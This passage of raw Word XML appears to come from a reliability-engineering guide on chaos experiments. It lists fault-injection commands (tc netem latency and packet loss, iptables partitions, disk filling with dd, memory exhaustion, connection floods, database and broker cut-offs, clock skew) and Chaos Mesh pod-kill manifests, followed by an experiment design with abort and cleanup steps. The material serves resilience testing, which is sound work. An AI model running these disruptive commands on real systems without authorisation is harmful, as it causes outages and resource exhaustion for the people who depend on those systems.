    <w:p w14:paraId="439C5728" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Introduce latency, packet loss, or partition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC869B4" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268C05DE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   tc qdisc add dev eth0 root netem delay 100ms 20ms  # add 100ms ± 20ms latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C9E991" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   tc qdisc add dev eth0 root netem loss 10%           # drop 10% of packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31124A4D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   tc qdisc add dev eth0 root netem corrupt 1%         # corrupt 1% of packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B931A8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB2D106" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   iptables -A INPUT -s 10.0.0.5 -j DROP              # partition from specific host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0309A89A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2495D21F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Expected: circuit breakers open, retries exhaust, fallbacks activate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AAAF41" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Verify: downstream error rate &lt; 0.1%, latency p99 &lt; SLO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09121FBE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="1758684F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>3. Resource exhaustion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A65F97" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Fill disk: dd if=/dev/zero of=/tmp/fill bs=1M count=50000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AADE2DF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Consume memory: stress --vm 1 --vm-bytes 50G</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE555A3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Max connections: ulimit -n 100; then flood connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781312C5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC4177D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Expected: graceful degradation, clear error messages, auto-scaling triggers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C5DD12" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Verify: service survives, no data corruption, metrics reflect resource pressure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BEBA08" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="37F38B1D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>4. Dependency failures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152CB8F2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Kill database: iptables -A OUTPUT -p tcp --dport 5432 -j DROP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBFD47B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Kill cache: redis-cli DEBUG SLEEP 30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D477835" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Kill message broker: kafka-server-stop.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DB571B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA97615" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Expected: service degrades gracefully, uses fallbacks, queues retry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2623E437" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   Verify: error messages informative, no data loss, recovery is automatic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F6CAA0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="1BC84241" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>5. Time-based failures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA28131" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Clock skew: date -s "5 minutes ago" (requires root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31431CE1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Slow clock: adjtimex --tick 90000 (10% slow)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B7A2C0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEB96BC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Expected: system handles time disagreement, SSL certificates still valid,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52029538" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">             distributed locks not broken by clock skew</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482366FA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">   Verify: no split-brain, no spurious timeouts, no auth failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1132524D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="528C0068" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Chaos tooling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF8649B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="57386B72" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Chaos Monkey (Netflix):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7EC5CA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Randomly terminates virtual machine instances in production</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7693E6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Originally: random kill in business hours (force engineers to build reliable systems)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C14BD43" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Now: Chaos Monkey as scheduled experiments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52ADA3F5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A77C811" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Philosophy: better to fail in small, controlled ways constantly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10431AC1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">              than catastrophically and unpredictably</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79662B23" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F91D36D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>AWS Fault Injection Simulator:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7868E438" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Managed chaos engineering (no infrastructure to run)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B084090" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Templates: EC2 instance stop, AZ power interrupt, API throttling, latency injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A1B6D8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F050E9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Chaos Mesh (Kubernetes-native):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425CEFAF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  CRD-based fault injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0263DBED" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF8D449" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  # Inject 100ms network delay to payment service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F4CF69" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  apiVersion: chaos-mesh.org/v1alpha1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C5C64A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  kind: NetworkChaos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B54C1E1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  metadata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9E82AD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    name: payment-latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6507D839" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  spec:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FEF771" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    action: delay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6867AA1A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    mode: all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF5919E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    selector:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E04300" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      labelSelectors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2477205B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        app: payment-service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0921163C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    delay:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555EA0BC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      latency: "100ms"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A493B31" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      jitter: "20ms"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56709A0C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    duration: "10m"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D290A2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01035B44" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  # Kill 50% of pods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D0ECF5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  apiVersion: chaos-mesh.org/v1alpha1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021F681F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  kind: PodChaos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EA28AF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  metadata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7727769F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    name: pod-kill-50pct</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFEB9AC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  spec:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A25D939" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    action: pod-kill</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090B1C1A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    mode: fixed-percent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A41D45C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    value: "50"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7C88C5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    selector:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36979BA6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      labelSelectors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713AFDFA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        app: inventory-service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2E5561" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    duration: "5m"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8E6A4B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0590830F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Chaos experiment design:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140098B0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  1. Hypothesis: "if inventory service goes down, checkout still works with stale cache data"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EE614A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55174D6A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  2. Baseline: measure current p99 latency and error rate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A01CD52" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322EBF9F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  3. Inject: kill all inventory service pods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467A01EA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A84EF7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  4. Observe:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EA3538" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">     - Error rate: expect &lt; 1% (stale cache serves most requests)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740876DD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">     - Latency: expect p99 &lt; 500ms (cache is fast)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C4EE1B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">     - User impact: expect &lt; 0.1% users see errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EF31FD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575D88E1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  5. Abort conditions: if error rate &gt; 5% → stop experiment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A591500" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0687851C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  6. Cleanup: restore inventory service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180A2A10" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FC65B4" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  7. Analysis: did hypothesis hold?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D68594" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">     If no: fix the resilience gap, re-run experiment to verify</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CF5AC6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:pict w14:anchorId="628F0CCB">
          <v:rect id="_x0000_i6446" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADA603B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9. Graceful Degradation — The Art of Partial Failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AA8C7A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fallbacks and Partial Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DC0461" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
